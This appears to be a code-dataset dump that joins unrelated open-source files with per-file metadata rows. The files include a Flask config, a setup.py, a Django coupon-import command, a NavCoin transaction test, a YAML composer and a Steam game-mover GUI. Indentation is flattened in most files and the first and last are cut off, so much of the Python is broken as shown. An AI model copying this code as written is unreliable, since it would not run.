rdb.smembers(key)
)
opens_raw = load(OPEN_KEY)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
opens_raw
)
)
)
return len(opened)
def get_stats(for_date):
dspan = [int(datetime.strptime(for_date, '%d-%m-%Y').strftime('%s'))]
dspan += [dspan[0]+86400]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
load(OPEN_KEY)
)
)
)
played = defaultdict(int)
for e in []:#load(PLAY_KEY):
try:
assert(e['category'] in CATEGORIES)
played[e['category']] += 1
except: pass
played['total'] = sum(played.values())
return len(opened),played
if __name__ == '__main__':
dt = sys.argv[1]
try:
dtt = sys.argv[2]
except: dtt = None
    # get_opens() takes the redis handle as its first argument (assumed here to
    # be the module-level `rdb` provided by `from services import *`) and
    # returns a plain count rather than a tuple.
    stats = get_opens(rdb, dt, dtt)
    print 'opened:', stats
| gpl-3.0 | 4,208,475,431,737,372,000 | 33.242857 | 569 | 0.54902 | false | 2.91961 | false | false | false |
danmilon/fragofonias | app.py | 1 | 1092 | from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.json import JSONEncoder
from datetime import date, datetime
import os
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://%s:%s@localhost/csa?charset=utf8' % (
os.environ['CSA_DB_USERNAME'], os.environ['CSA_DB_PASSWORD']
)
sqlite_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'db.sqlite')
app.config['SQLALCHEMY_BINDS'] = {
'wallet': 'sqlite:///' + sqlite_path
}
app.config['SQLALCHEMY_ECHO'] = False
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
try:
if isinstance(obj, date):
return JSONEncoder.default(
self,
datetime(obj.year, obj.month, obj.day))
iterable = iter(obj)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, obj)
app.json_encoder = CustomJSONEncoder
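# Illustrative behaviour (assumed usage, not in the original file): with this
# encoder installed, jsonify() on a payload containing date(2016, 1, 31) is
# serialized via Flask's default datetime handling, and any other iterable
# (e.g. a generator) is emitted as a JSON list.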
| mit | 2,123,392,683,379,252,500 | 28.513514 | 94 | 0.624542 | false | 3.580328 | false | false | false |
sambarluc/xmitgcm | setup.py | 1 | 1468 | #!/usr/bin/env python
import os
import re
import sys
import warnings
from setuptools import setup, find_packages
VERSION = '0.2.1'
DISTNAME = 'xmitgcm'
LICENSE = 'Apache'
AUTHOR = 'Ryan Abernathey'
AUTHOR_EMAIL = '[email protected]'
URL = 'https://github.com/xgcm/xmitgcm'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['xarray >= 0.8.2', 'dask >= 0.12']
SETUP_REQUIRES = ['pytest-runner']
TESTS_REQUIRE = ['pytest >= 2.8', 'coverage']
DESCRIPTION = "Read MITgcm mds binary files into xarray"
def readme():
with open('README.rst') as f:
return f.read()
setup(name=DISTNAME,
version=VERSION,
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=readme(),
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages())
| mit | 8,516,770,780,736,620,000 | 27.784314 | 57 | 0.658719 | false | 3.50358 | false | false | false |
EuroPython/epcon | p3/management/commands/create_bulk_coupons.py | 1 | 2939 |
""" Create a batch of single use discount coupons from a CSV file.
Parameters: <conference> <csv-file>
Creates coupons based on the CSV file contents:
code - coupon code
max_usage - max. number of uses
items_per_usage - max number of items per use
value - value of the coupon in percent
description - description
fares - comma separated list of included fares
Use --dry-run to test drive the script.
"""
import sys
import csv
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from conference import models as cmodels
from assopy.models import Coupon
###
class Command(BaseCommand):
    args = '<conference> <csv-file>'
# Dry run ?
dry_run = False
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('conference')
parser.add_argument('csv')
# Named (optional) arguments
parser.add_argument('--dry-run',
action='store_true',
dest='dry_run',
default=False,
help='Do everything except create the coupons')
@transaction.atomic
def handle(self, *args, **options):
conference = cmodels.Conference.objects.get(code=options['conference'])
self.dry_run = options.get('dry_run', False)
csv_filename = options['csv']
# Get set of existing coupon codes
all_codes = set(c['code'] for c in Coupon.objects\
.filter(conference=conference.code)\
.values('code'))
# Valid fares (conference fares only)
all_fares = cmodels.Fare.objects\
.filter(conference=conference.code)
# Create coupons
if csv_filename == 'stdin':
csv_file = sys.stdin
else:
csv_file = open(csv_filename)
with csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
code = row['code'].strip()
if not code:
# Skip lines without code
continue
if code in all_codes:
# Skip coupons which already exist
print ('Coupon %r already exists - skipping' % code)
continue
c = Coupon(conference=conference)
c.code = code
c.max_usage = int(row.get('max_usage', 1))
c.items_per_usage = int(row.get('items_per_usage', 1))
c.value = row['value']
c.description = row.get('description', '')
                if not self.dry_run:
                    c.save()
                    # The m2m fares assignment needs a saved instance, so it
                    # stays inside the dry-run guard.
                    c.fares = all_fares.filter(
                        code__in=[x.strip()
                                  for x in row['fares'].split(',')])
                print ('Coupon %r created' % c.code)
| bsd-2-clause | 2,320,317,015,816,716,000 | 30.945652 | 79 | 0.539639 | false | 4.309384 | false | false | false |
mxOBS/deb-pkg_trusty_chromium-browser | third_party/chromite/lib/paygen/fixup_path.py | 1 | 1342 | # Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper for other scripts that need a PYTHONPATH entry for crostools.
Generally used by import statements of the form:
from chromite.lib.paygen import foo
from crostools.scripts import foo
"""
# pylint: disable=bad-continuation
from __future__ import print_function
import os.path
import sys
# Find the correct root path to insert into sys.path for importing
# modules in this source.
CROSTOOLS_ROOT = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))
CROSTOOLS_PATH_ROOT = os.path.dirname(CROSTOOLS_ROOT)
CROS_SRC_PLATFORM_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'platform')
CROS_AUTOTEST_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'third_party',
'autotest', 'files')
def _SysPathPrepend(dir_name):
"""Prepend a directory to Python's import path."""
if os.path.isdir(dir_name) and dir_name not in sys.path:
sys.path.insert(0, dir_name)
def FixupPath():
_SysPathPrepend(CROS_AUTOTEST_PATH)
_SysPathPrepend(CROS_SRC_PLATFORM_PATH)
_SysPathPrepend(CROSTOOLS_PATH_ROOT)
# TODO(dgarrett): Remove this call after all importers do it locally.
FixupPath()
| bsd-3-clause | 203,790,605,844,258,900 | 28.173913 | 77 | 0.717586 | false | 3.092166 | false | false | false |
levilucio/SyVOLT | GM2AUTOSAR_MM/Properties/from_eclipse/HP1_ConnectedLHS.py | 1 | 19004 | from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HP1_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HP1_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HP1_ConnectedLHS, self).__init__(name='HP1_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'P1')
# Set the node attributes
# match class PhysicalNode() node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__PhysicalNode"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Partition() node
self.add_node()
self.vs[1]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__Partition"""
self.vs[1]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Module() node
self.add_node()
self.vs[2]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__Module"""
self.vs[2]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Scheduler() node
self.add_node()
self.vs[3]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__Scheduler"""
self.vs[3]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Service() node
self.add_node()
self.vs[4]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__Service"""
self.vs[4]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent the edges of the property.
# match association PhysicalNode--partition-->Partition node
self.add_node()
self.vs[5]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
"""
self.vs[5]["MT_label__"] = """6"""
self.vs[5]["MT_subtypes__"] = []
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__directLink_S"""
self.vs[5]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc5')
# match association Partition--module-->Module node
self.add_node()
self.vs[6]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
"""
self.vs[6]["MT_label__"] = """7"""
self.vs[6]["MT_subtypes__"] = []
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc6')
# match association Module--scheduler-->Scheduler node
self.add_node()
self.vs[7]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
"""
self.vs[7]["MT_label__"] = """8"""
self.vs[7]["MT_subtypes__"] = []
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_S"""
self.vs[7]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc7')
# match association Scheduler--provided-->Service node
self.add_node()
self.vs[8]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
"""
self.vs[8]["MT_label__"] = """9"""
self.vs[8]["MT_subtypes__"] = []
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__directLink_S"""
self.vs[8]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc8')
# Add the edges
self.add_edges([
(0,5), # match_class PhysicalNode() -> association partition
(5,1), # association partition -> match_class Partition()
(1,6), # match_class Partition() -> association module
(6,2), # association module -> match_class Module()
(2,7), # match_class Module() -> association scheduler
(7,3), # association scheduler -> match_class Scheduler()
(3,8), # match_class Scheduler() -> association provided
(8,4) # association provided -> match_class Service()
])
# Add the attribute equations
self["equations"] = []
def eval_attr11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr12(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr13(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr14(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr15(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr16(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
def eval_attr17(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
def eval_attr18(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
def eval_attr19(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| mit | 5,550,988,573,478,345,000 | 51.788889 | 125 | 0.470375 | false | 5.183852 | false | false | false |
navcoindev/navcoin-core | qa/rpc-tests/txn_clone.py | 1 | 7549 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with an equivalent malleability clone
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
class TxnMallTest(NavCoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 NAV:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 NAV serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
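        # Annotation (derived from the layout described above): 4-byte version
        # + 1-byte input count + 36-byte outpoint + 1-byte scriptSig length
        # stub + 4-byte sequence + 1-byte output count = 47 bytes = 94 hex
        # chars, and 40 NAV = 4,000,000,000 base units = 0xEE6B2800, which is
        # "00286bee00000000" in little-endian hex.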
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50NAV for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 NAV for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
| mit | -8,845,441,044,191,796,000 | 46.477987 | 111 | 0.592794 | false | 3.693249 | true | false | false |
croxis/SpaceDrive | spacedrive/renderpipeline/rplibs/yaml/yaml_py3/composer.py | 1 | 5020 |
__all__ = ['Composer', 'ComposerError']
from .error import MarkedYAMLError
from .events import *
from .nodes import *
class ComposerError(MarkedYAMLError):
pass
class Composer:
def __init__(self):
self.anchors = {}
def check_node(self):
# Drop the STREAM-START event.
if self.check_event(StreamStartEvent):
self.get_event()
# If there are more documents available?
return not self.check_event(StreamEndEvent)
def get_node(self):
# Get the root node of the next document.
if not self.check_event(StreamEndEvent):
return self.compose_document()
def get_single_node(self):
# Drop the STREAM-START event.
self.get_event()
# Compose a document if the stream is not empty.
document = None
if not self.check_event(StreamEndEvent):
document = self.compose_document()
# Ensure that the stream contains no more documents.
if not self.check_event(StreamEndEvent):
event = self.get_event()
raise ComposerError("expected a single document in the stream",
document.start_mark, "but found another document",
event.start_mark)
# Drop the STREAM-END event.
self.get_event()
return document
def compose_document(self):
# Drop the DOCUMENT-START event.
self.get_event()
# Compose the root node.
node = self.compose_node(None, None)
# Drop the DOCUMENT-END event.
self.get_event()
self.anchors = {}
return node
def compose_node(self, parent, index):
if self.check_event(AliasEvent):
event = self.get_event()
anchor = event.anchor
if anchor not in self.anchors:
raise ComposerError(None, None, "found undefined alias %r"
% anchor, event.start_mark)
return self.anchors[anchor]
event = self.peek_event()
anchor = event.anchor
if anchor is not None:
if anchor in self.anchors:
raise ComposerError("found duplicate anchor %r; first occurence"
% anchor, self.anchors[anchor].start_mark,
"second occurence", event.start_mark)
self.descend_resolver(parent, index)
if self.check_event(ScalarEvent):
node = self.compose_scalar_node(anchor)
elif self.check_event(SequenceStartEvent):
node = self.compose_sequence_node(anchor)
elif self.check_event(MappingStartEvent):
node = self.compose_mapping_node(anchor)
self.ascend_resolver()
return node
def compose_scalar_node(self, anchor):
event = self.get_event()
tag = event.tag
if tag is None or tag == '!':
tag = self.resolve(ScalarNode, event.value, event.implicit)
node = ScalarNode(tag, event.value,
event.start_mark, event.end_mark, style=event.style)
if anchor is not None:
self.anchors[anchor] = node
return node
def compose_sequence_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(SequenceNode, None, start_event.implicit)
node = SequenceNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
index = 0
while not self.check_event(SequenceEndEvent):
node.value.append(self.compose_node(node, index))
index += 1
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
def compose_mapping_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(MappingNode, None, start_event.implicit)
node = MappingNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
while not self.check_event(MappingEndEvent):
#key_event = self.peek_event()
item_key = self.compose_node(node, None)
#if item_key in node.value:
# raise ComposerError("while composing a mapping", start_event.start_mark,
# "found duplicate key", key_event.start_mark)
item_value = self.compose_node(node, item_key)
#node.value[item_key] = item_value
node.value.append((item_key, item_value))
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
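# Note (added for context): Composer is one of the mix-ins that yaml combines
# into a Loader alongside Reader, Scanner, Parser, Constructor and Resolver;
# get_node()/get_single_node() turn parser events into the node graph that the
# constructor later maps to Python objects.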
| mit | 6,579,740,711,259,711,000 | 34.115108 | 89 | 0.564343 | false | 4.200837 | false | false | false |
benopotamus/steam-game-mover | main.py | 1 | 4905 | #!/usr/bin/env python
'''Allows easy moving (with symlinking) of folders to and from the SteamApps folder.
Intended for users with an SSD that cannot hold all their Steam games. It lets them easily move games they are not currently playing to a slower drive and move them back at a later date. The symlinking means the games can still be played regardless of which drive they are on.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os, wx
import layout, Model
from wx.lib.pubsub import Publisher as pub
class Frame(layout.MainFrame):
	'''The UI was generated with wxFormBuilder (layout.MainFrame), so subclass it and override the necessary methods and attributes.'''
def __init__(self, parent):
super( Frame, self ).__init__(parent)
#### The following binds/subscribes controller functions to model broadcasts ####
# These will all just take the broadcast and update the view/widgets from layout.py
pub.subscribe(self.primary_path_changed, "PRIMARY PATH CHANGED")
pub.subscribe(self.secondary_path_changed, "SECONDARY PATH CHANGED")
pub.subscribe(self.games_move_to_secondary, "GAMES MOVED TO SECONDARY")
pub.subscribe(self.games_move_to_primary, "GAMES MOVED TO PRIMARY")
pub.subscribe(self.display_move_dialog, "MOVING GAMES")
pub.subscribe(self.window_size_changed, "WINDOW SIZE CHANGED")
pub.subscribe(self.window_coords_changed, "WINDOW COORDS CHANGED")
pub.subscribe(self.use_default_window_size, "NO SIZE FOUND")
# Model is created after subscriptions because it broadcasts on instantiation (when it gets settings from config file)
self.model = Model.Model()
#### The following 'on' methods are bound to the widgets in layout.py ####
def on_games_move( self, event ):
if event.GetEventObject().GetName() == 'move_to_secondary_button':
games = self.left_listbox.GetSelectionsStrings()
self.model.move_games_to_secondary(games)
